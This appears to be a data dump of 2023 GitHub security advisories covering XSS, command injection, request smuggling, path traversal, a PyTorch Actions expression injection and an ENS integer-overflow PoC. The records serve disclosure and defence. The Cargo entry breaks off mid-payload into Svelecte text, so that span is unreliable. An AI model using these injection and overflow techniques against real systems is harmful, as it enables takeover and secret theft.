'https://github.com/nexB/scancode.io/commit/07ec0de1964b14bf085a1c9a27ece2b61ab6105c'}, {'type': 'PACKAGE', 'url': 'https://github.com/nexB/scancode.io'}, {'type': 'WEB', 'url': 'https://github.com/nexB/scancode.io/blob/main/scanpipe/pipes/fetch.py#L185'}, {'type': 'WEB', 'url': 'https://github.com/nexB/scancode.io/releases/tag/v32.5.1'}]","{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:41:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-wrrj-h57r-vx9p,2023-08-24T22:56:04Z,2023-08-24T22:15:51Z,,['CVE-2023-40030'],Malicious dependencies can inject arbitrary JavaScript into cargo-generated timing reports,"The Rust Security Response WG was notified that Cargo did not escape Cargo feature names when including them in the report generated by `cargo build --timings`. A malicious package included as a dependency may inject nearly arbitrary HTML here, potentially leading to XSS if the report is subsequently uploaded somewhere. The severity of this vulnerability is ""low"" for users relying on dependencies from git, local paths, or alternative registries. Users who solely depend on crates.io are unaffected. Note that **by design** Cargo allows code execution at build time, due to build scripts and procedural macros. The vulnerability in this advisory allows performing a subset of the possible damage in a harder to track down way. Your dependencies must still be trusted if you want to be protected from attacks, as it's possible to perform the same attacks with build scripts and procedural macros. # Overview Rust 1.60.0 [introduced](https://blog.rust-lang.org/2022/04/07/Rust-1.60.0.html#cargo---timings) `cargo build --timings`, which produces a report of how long the different steps of the build process took. It includes lists of Cargo features for each crate. Prior to Rust 1.72, Cargo feature names were allowed to contain almost any characters (with some exceptions as used by the feature syntax), but it would produce a future incompatibility warning about them [since Rust 1.49](https://github.com/rust-lang/cargo/pull/8814). crates.io is far more stringent about what it considers a valid feature name and has not allowed such feature names. As the feature names were included unescaped in the timings report, they could be used to inject Javascript into the page, for example with a feature name like `features = ["" import Svelecte from 'svelecte'; const list = [ { id: 1, name: `Item 1` }, { id: 2, name: `Item 2` }, { id: 3, name: 'Item 3'} ]; ``` This code snippet demonstrates how the vulnerability can be used to execute arbitrary JavaScript without the user's knowledge when the Svelecte dropdown is opened (note that visually item 2 appears identical to other items). In this case the script is hardcoded, but in practice the real danger is that some applications may use Svelecte with items that are created by users or come from low-trust sources where someone else could add a malicious script to the item name. ### Impact Any site that uses Svelecte with dynamically created items either from an external source or from user-created content could be vulnerable to an XSS attack (execution of untrusted JavaScript), clickjacking or any other attack that can be performed with arbitrary HTML injection. The actual impact of this vulnerability for a specific application depends on how trustworthy the sources that provide Svelecte items are and the steps that the application has taken to mitigate XSS attacks. XSS attacks using this vulnerability are mostly mitigated by a Content Security Policy that blocks inline JavaScript. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'svelecte'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.16.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mskocik/svelecte/security/advisories/GHSA-7h45-grc5-89wq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38687'}, {'type': 'PACKAGE', 'url': 'https://github.com/mskocik/svelecte'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:14:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-7r88-wjhj-jr8m,2023-08-04T13:31:59Z,2023-08-01T15:30:30Z,,['CVE-2022-39987'],RaspAP Command Injection vulnerability,A Command injection vulnerability in RaspAP 2.8.0 thru 2.9.2 allows an authenticated attacker to execute arbitrary OS commands as root via the `entity` POST parameters in `/ajax/networking/get_wgkey.php`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'billz/raspap-webgui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'last_affected': '2.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-39987'}, {'type': 'PACKAGE', 'url': 'https://github.com/RaspAP/raspap-webgui'}, {'type': 'WEB', 'url': 'https://github.com/RaspAP/raspap-webgui/blob/master/ajax/networking/get_wgkey.php'}, {'type': 'WEB', 'url': 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T19:57:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-4gcf-5m39-98mc,2023-08-18T14:25:07Z,2023-08-16T21:02:29Z,,['CVE-2023-40034'],Woodpecker does not validate webhook before changing any data,"### Impact An attacker can post malformed webhook data which leads to an update of the repository data that can e.g. allow the takeover of a repository. This is only critical if the CI is configured for public usage and connected to a forge witch is also in public usage. ### Patches Please use either next or the latest v1.0 e.g. v1.0.2 ### Workarounds Secure the CI system by making it inaccessible to untrusted entities, for example, by placing it behind a firewall. ### References Fix: https://github.com/woodpecker-ci/woodpecker/pull/2221 Backport: https://github.com/woodpecker-ci/woodpecker/pull/2222","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/woodpecker-ci/woodpecker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/woodpecker-ci/woodpecker/security/advisories/GHSA-4gcf-5m39-98mc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40034'}, {'type': 'WEB', 'url': 'https://github.com/woodpecker-ci/woodpecker/pull/2221'}, {'type': 'WEB', 'url': 'https://github.com/woodpecker-ci/woodpecker/pull/2222'}, {'type': 'WEB', 'url': 'https://github.com/woodpecker-ci/woodpecker/commit/6e4c2f84cc84661d58cf1c0e5c421a46070bb105'}, {'type': 'PACKAGE', 'url': 'https://github.com/woodpecker-ci/woodpecker'}, {'type': 'WEB', 'url': 'https://github.com/woodpecker-ci/woodpecker/releases/tag/v1.0.2'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:02:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-6jwc-qr2q-7xwj,2023-08-10T22:16:47Z,2023-08-03T16:36:34Z,,['CVE-2023-38697'],protocol-http1 HTTP Request/Response Smuggling vulnerability,"### Impact [RFC 9112 Section 7.1](https://www.rfc-editor.org/rfc/rfc9112#name-chunked-transfer-coding) defined the format of chunk size, chunk data and chunk extension (detailed ABNF is in Appendix section). In summary: - The value of Content-Length header should be a string of 0-9 digits. - The chunk size should be a string of hex digits and should split from chunk data using CRLF. - The chunk extension shouldn't contain any invisible character. However, we found that Falcon has following behaviors while disobey the corresponding RFCs. - Falcon accepts Content-Length header values that have ""+"" prefix. - Falcon accepts Content-Length header values that written in hexadecimal with ""0x"" prefix. - Falcon accepts ""0x"" and ""+"" prefixed chunk size. - Falcon accepts LF in chunk extension. This behavior can lead to desync when forwarding through multiple HTTP parsers, potentially results in HTTP request smuggling and firewall bypassing. Note that while these issues were reproduced in Falcon (the server), the issue is with `protocol-http1` which implements the HTTP/1 protocol parser. We have not yet been advised of any real world exploit or practical attack. ### Patches Fixed in `protocol-http1` v0.15.1+. ### Workarounds None. ### References https://github.com/socketry/protocol-http1/pull/20","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'protocol-http1'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/socketry/protocol-http1/security/advisories/GHSA-6jwc-qr2q-7xwj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38697'}, {'type': 'WEB', 'url': 'https://github.com/socketry/protocol-http1/pull/20'}, {'type': 'WEB', 'url': 'https://github.com/socketry/protocol-http1/commit/e11fc164fd2b36f7b7e785e69fa8859eb06bcedd'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/protocol-http1/CVE-2023-38697.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/socketry/protocol-http1'}, {'type': 'WEB', 'url': 'https://www.rfc-editor.org/rfc/rfc9112#name-chunked-transfer-coding'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:36:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-chgr-j2p9-jjh8,2023-08-23T20:07:26Z,2023-08-14T18:32:59Z,,['CVE-2023-40312'],OpenNMS vulnerable to Cross-site Scripting,"Multiple reflected XSS were found on different JSP files with unsanitized parameters in OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms that an attacker can modify to craft a malicious XSS payload. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Jordi Miralles Comins for reporting this issue. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40312'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6356'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/1365ba9129f1762707fdbf1edd1f3e460bfb31e0'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/horizon/32/releasenotes/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:12:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-vmf9-6pcv-xr87,2023-08-29T23:34:51Z,2023-08-29T23:34:51Z,,['CVE-2023-39522'],Username enumeration attack in goauthentik,"## Summary Using a recovery flow with an identification stage an attacker is able to determine if a username exists. ## Impact Only setups configured with a recovery flow are impacted by this. Anyone with a user account on a system with the recovery flow described above is susceptible to having their username/email revealed as existing. ## Details An attacker can easily enumerate and check users' existence using the recovery flow, as a clear message is shown when a user doesn't exist. Depending on configuration this can either be done by username, email, or both. The invalid and valid usernames should both show the same message and always send an email. Article for reference here: https://postmarkapp.com/guides/password-reset-email-best-practices#how-to-make-sure-your-password-reset-emails-are-secure ### For more information If you have any questions or comments about this advisory: - Email us at [security@goauthentik.io](mailto:security@goauthentik.io) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@goauthentik/api'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2023.6.0'}, {'fixed': '2023.6.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@goauthentik/api'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2023.5.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/goauthentik/authentik/security/advisories/GHSA-vmf9-6pcv-xr87'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39522'}, {'type': 'WEB', 'url': 'https://github.com/goauthentik/authentik/commit/aa874dd92a770d5f8cd8f265b7cdd31cd73a4599'}, {'type': 'PACKAGE', 'url': 'https://github.com/goauthentik/authentik'}]","{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T23:34:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-rmgx-3w4r-xcfp,2023-08-21T20:17:38Z,2023-08-19T03:32:19Z,,['CVE-2023-4432'],Cockpit Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit version 2.6.3 and prior. A patch is available at commit 2a93d391fbd2dd9e730f65d43b29beb65903d195 and anticipated to be part of version 2.6.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4432'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/2a93d391fbd2dd9e730f65d43b29beb65903d195'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/69684663-6822-41ff-aa05-afbdb8f5268f'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:17:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-2474-2566-3qxp,2023-09-01T02:21:07Z,2023-08-22T21:30:26Z,,['CVE-2022-44730'],Apache Batik information disclosure vulnerability,"Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik.This issue affects Apache XML Graphics Batik: 1.16. A malicious SVG can probe user profile / data and send it directly as parameter to a URL. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.xmlgraphics:batik-script'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0'}, {'fixed': '1.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-44730'}, {'type': 'WEB', 'url': 'https://github.com/apache/xmlgraphics-batik/commit/64658ccda90deaf6bf5f5b4d4a2ec365fe648bfa'}, {'type': 'WEB', 'url': 'https://github.com/apache/xmlgraphics-batik/commit/f9ae69233eadfbd392a4a08a55618f97343b467c'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/xmlgraphics-batik'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/BATIK-1347'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/58m5817jr059f4v1zogh0fngj9pwjyj0'}, {'type': 'WEB', 'url': 'https://xmlgraphics.apache.org/security.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/22/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/22/5'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T17:51:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-92j5-3459-qgp4,2023-08-22T16:41:04Z,2023-08-15T18:31:32Z,,['CVE-2023-38896'],LangChain vulnerable to arbitrary code execution,An issue in Harrison Chase langchain before version 0.0.236 and before allows a remote attacker to execute arbitrary code via the `from_math_prompt` and `from_colored_object_prompt` functions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.236'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38896'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/5872'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/pull/6003'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/commit/8ba9835b925473655914f63822775679e03ea137'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/commit/e294ba475a355feb95003ed8f1a2b99942509a9e'}, {'type': 'PACKAGE', 'url': 'https://github.com/langchain-ai/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-146.yaml'}, {'type': 'WEB', 'url': 'https://twitter.com/llm_sec/status/1668711587287375876'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T21:18:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-2xx4-jj5v-6mff,2023-08-04T17:27:00Z,2023-08-04T17:27:00Z,,['CVE-2023-37896'],Nuclei Path Traversal vulnerability,"## Overview We have identified and addressed a security issue in the Nuclei project that affected users utilizing Nuclei as **Go code (SDK)** running **custom templates**. This issue did not affect CLI users. The problem was related to sanitization issues with payloads loading in `sandbox` mode. ## Details In the previous versions, there was a potential risk with payloads loading in sandbox mode. The issue occurred due to relative paths not being converted to absolute paths before doing the check for `sandbox` flag allowing arbitrary files to be read on the filesystem in certain cases when using Nuclei from `Go` SDK implementation. This issue has been fixed in the latest release, v2.9.9. We have also enabled sandbox by default for filesystem loading. This can be optionally disabled if required. The `-sandbox` option has been **deprecated** and is now divided into two new options: `-lfa` (allow local file access) which is enabled by default and `-lna` (restrict local network access) which can be enabled by users optionally. The `-lfa` allows file (payload) access anywhere on the system (disabling sandbox effectively), and `-lna` blocks connections to the local/private network. ## Affected Versions This issue affected all versions of Nuclei prior to v2.9.9. ## Patches We recommend all users upgrade to the latest version, [v2.9.9](https://github.com/projectdiscovery/nuclei/releases/tag/v2.9.9), which includes the security fix. ### References - [patch](https://github.com/projectdiscovery/nuclei/pull/3927) - [releases](https://github.com/projectdiscovery/nuclei/releases/tag/v2.9.9) ## Acknowledgments We would like to thank **keomutchoiboi** who reported this issue to us via our security email, [security@projectdiscovery.io](mailto:security@projectdiscovery.io). We appreciate the responsible disclosure of this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/projectdiscovery/nuclei/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-2xx4-jj5v-6mff'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37896'}, {'type': 'WEB', 'url': 'https://github.com/projectdiscovery/nuclei/pull/3927'}, {'type': 'PACKAGE', 'url': 'https://github.com/projectdiscovery/nuclei'}, {'type': 'WEB', 'url': 'https://github.com/projectdiscovery/nuclei/releases/tag/v2.9.9'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-04T17:27:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-hw6r-g8gj-2987,2023-08-30T20:47:13Z,2023-08-30T20:47:13Z,,[],Actions expression injection in `filter-test-configs` (`GHSL-2023-181`),"The `pytorch/pytorch` `filter-test-configs` workflow is vulnerable to an expression injection in Actions, allowing an attacker to potentially leak secrets and alter the repository using the workflow. ### Details The [`filter-test-configs`](https://github.com/pytorch/pytorch/blob/ec26947c586dd323d741da80008403664c533f65/.github/actions/filter-test-configs/action.yml) workflow is using the raw `github.event.workflow_run.head_branch` value inside the `filter` step: ```yaml - name: Select all requested test configurations shell: bash env: GITHUB_TOKEN: ${{ inputs.github-token }} JOB_NAME: ${{ steps.get-job-name.outputs.job-name }} id: filter run: | ... python3 ""${GITHUB_ACTION_PATH}/../../scripts/filter_test_configs.py"" \ ... --branch ""${{ github.event.workflow_run.head_branch }}"" ``` In the event of a repository using `filter-test-configs` in a `pull_request_target`-triggered workflow, an attacker could use a malicious branch name to gain command execution in the step and potentially leak secrets. ```yml name: Example on: pull_request_target jobs: example: runs-on: ubuntu-latest steps: - name: Filter uses: pytorch/pytorch/.github/actions/filter-test-configs@v2 ``` #### Impact This issue may lead to stealing workflow secrets. #### Remediation 1. Use an intermediate environment variable for potentially attacker-controlled values such as `github.event.workflow_run.head_branch`: ```yaml - name: Select all requested test configurations shell: bash env: GITHUB_TOKEN: ${{ inputs.github-token }} JOB_NAME: ${{ steps.get-job-name.outputs.job-name }} HEAD_BRANCH: ${{ github.event.workflow_run.head_branch }} id: filter run: | ... python3 ""${GITHUB_ACTION_PATH}/../../scripts/filter_test_configs.py"" \ ... --branch ""$HEAD_BRANCH"" ``` #### Resources * [CodeQL for JavaScript - Expression injection in Actions](https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection/) * [Keeping your GitHub Actions and workflows secure Part 2: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input/) * [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) ",[],"[{'package': {'ecosystem': 'GitHub Actions', 'name': 'https://github.com/pytorch/pytorch/.github/actions/filter-test-configs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.0.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/pytorch/pytorch/security/advisories/GHSA-hw6r-g8gj-2987'}, {'type': 'PACKAGE', 'url': 'https://github.com/pytorch/pytorch'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:47:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-8hx6-qv6f-xgcw,2023-08-10T21:56:51Z,2023-08-01T19:55:14Z,,['CVE-2023-38699'],MindsDB can be made to not verify SSL certificates,"### Summary MindsDB's AI Virtual Database allows developers to connect any AI/ML model to any datasource. Prior to version 23.7.4.0, a call to requests with `verify=False` disables SSL certificate checks. This rule enforces always verifying SSL certificates for methods in the Requests library. In version 23.7.4.0, certificates are validated by default, which is the desired behavior Encryption in general is typically critical to the security of many applications. Using TLS can significantly increase security by guaranteeing the identity of the party you are communicating with. This is accomplished by one or both parties presenting trusted certificates during the connection initialization phase of TLS. It is important to note that modules such as httplib within the Python standard library did not verify certificate chains until it was fixed in 2.7.9 release. ### Details Severity: Critical ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'MindsDB'}, 'ecosystem_specific': {'affected_functions': ['mindsdb.integrations.handlers.dremio_handler.dremio_handler.DremioHandler.connect']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.7.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mindsdb/mindsdb/security/advisories/GHSA-8hx6-qv6f-xgcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38699'}, {'type': 'WEB', 'url': 'https://github.com/mindsdb/mindsdb/commit/083afcf6567cf51aa7d89ea892fd97689919053b'}, {'type': 'PACKAGE', 'url': 'https://github.com/mindsdb/mindsdb'}, {'type': 'WEB', 'url': 'https://github.com/mindsdb/mindsdb/releases/tag/v23.7.4.0'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/mindsdb/PYSEC-2023-140.yaml'}]","{'cwe_ids': ['CWE-311'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T19:55:14Z', 'nvd_published_at': None}" 1.4.0,GHSA-rrxv-q8m4-wch3,2023-08-10T22:10:22Z,2023-08-01T19:48:31Z,,['CVE-2023-38698'],.eth registrar controller can shorten the duration of registered names,"### Description According to the documentation, controllers are allowed to register new domains and extend the expiry of existing domains, but they cannot change the ownership or reduce the expiration time of existing domains. However, a preliminary analysis suggests that an attacker-controlled controller may be able to reduce the expiration time of existing domains due to an integer overflow in the renew function. The vulnerability resides in the following GitHub repository: https://github.com/ensdomains/ens-contracts/blob/master/contracts/ethregistrar/BaseRegistrarImplementation.sol#L171 The vulnerable line of code is: ```js require( expiries[id] + duration + GRACE_PERIOD > duration + GRACE_PERIOD ); // Prevent future overflow ``` In this code snippet, the `duration` variable is user-supplied, making it possible to provide a value that would cause an overflow on both sides of the '>' expression, ultimately rendering the condition true. Specifically, when the duration is set to `2^256 - GRACE_PERIOD`, the subsequent line `expiries[id] += duration;` also experiences an overflow, as `expiries[id]` is greater than `GRACE_PERIOD`. This results in the reduction of `expiries[id]` by `GRACE_PERIOD`. By repeatedly calling the renew function, an attacker could potentially force the expiration of an ENS record. You can find the PoC included in the attached document. To execute the test, please use the following command: ``` forge test -vvv --match-contract RegistrarExploit --fork-url ``` Replace `` with your Alchemy API URL. This command will run the Foundry test file and demonstrate the potential vulnerability. ### Impact If successfully exploited, this vulnerability would enable attackers to force the expiration of any ENS record, ultimately allowing them to claim the affected domains for themselves. Currently, it would require a malicious DAO to exploit it. Nevertheless, any vulnerability present in the controllers could potentially render this issue exploitable in the future. An additional concern is the possibility of renewal discounts. Should ENS decide to implement a system that offers unlimited .eth domains for a fixed fee in the future, the vulnerability could become exploitable by any user due to the reduced attack cost. ### Patches A mitigation is being developed. ### Workarounds As long as registration cost remains linear or superlinear based on registration duration, or limited to a reasonable maximum (eg, 1 million years), this vulnerability could only be exploited by a malicious DAO. The interim workaround is thus to take no action. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@ensdomains/ens-contracts'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.22'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.0.21'}}]","[{'type': 'WEB', 'url': 'https://github.com/ensdomains/ens-contracts/security/advisories/GHSA-rrxv-q8m4-wch3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38698'}, {'type': 'WEB', 'url': 'https://github.com/ensdomains/ens-contracts/commit/e6b136e979084de3761c125142620304173990ca'}, {'type': 'PACKAGE', 'url': 'https://github.com/ensdomains/ens-contracts'}, {'type': 'WEB', 'url': 'https://github.com/ensdomains/ens-contracts/blob/master/contracts/ethregistrar/BaseRegistrarImplementation.sol#L171'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T19:48:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-rcx8-48pc-v9q8,2023-08-24T22:20:47Z,2023-08-24T22:20:47Z,,[],mail-internals use-after-free vulnerability in `vec_insert_bytes`,"Incorrect reallocation logic in the function [`vec_insert_bytes`](https://docs.rs/mail-internals/0.2.3/mail_internals/utils/fn.vec_insert_bytes.html) causes a use-after-free. This function does not have to be called directly to trigger the vulnerability because many methods on [`EncodingWriter`](https://docs.rs/mail-internals/0.2.3/mail_internals/encoder/struct.EncodingWriter.html) call this function internally. The mail-\* suite is unmaintained and the upstream sources have been actively vandalised. A fixed `mail-internals-ng` (and `mail-headers-ng` and `mail-core-ng`) crate has been published which fixes this, and a dependency on another unsound crate. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'mail-internals'}, 'ecosystem_specific': {'affected_functions': ['mail_internals::utils::vec_insert_bytes']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'last_affected': '0.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rustsec/advisory-db/blob/main/crates/mail-internals/RUSTSEC-2023-0054.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0054.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:20:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-8j3v-68w3-3848,2023-08-09T20:38:27Z,2023-08-07T15:30:27Z,,['CVE-2022-38795'],Gitea erroneous repo clones,"In Gitea through 1.17.1, repo cloning can occur in the migration function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'code.gitea.io/gitea'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.17.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-38795'}, {'type': 'WEB', 'url': 'https://github.com/go-gitea/gitea/pull/20869'}, {'type': 'WEB', 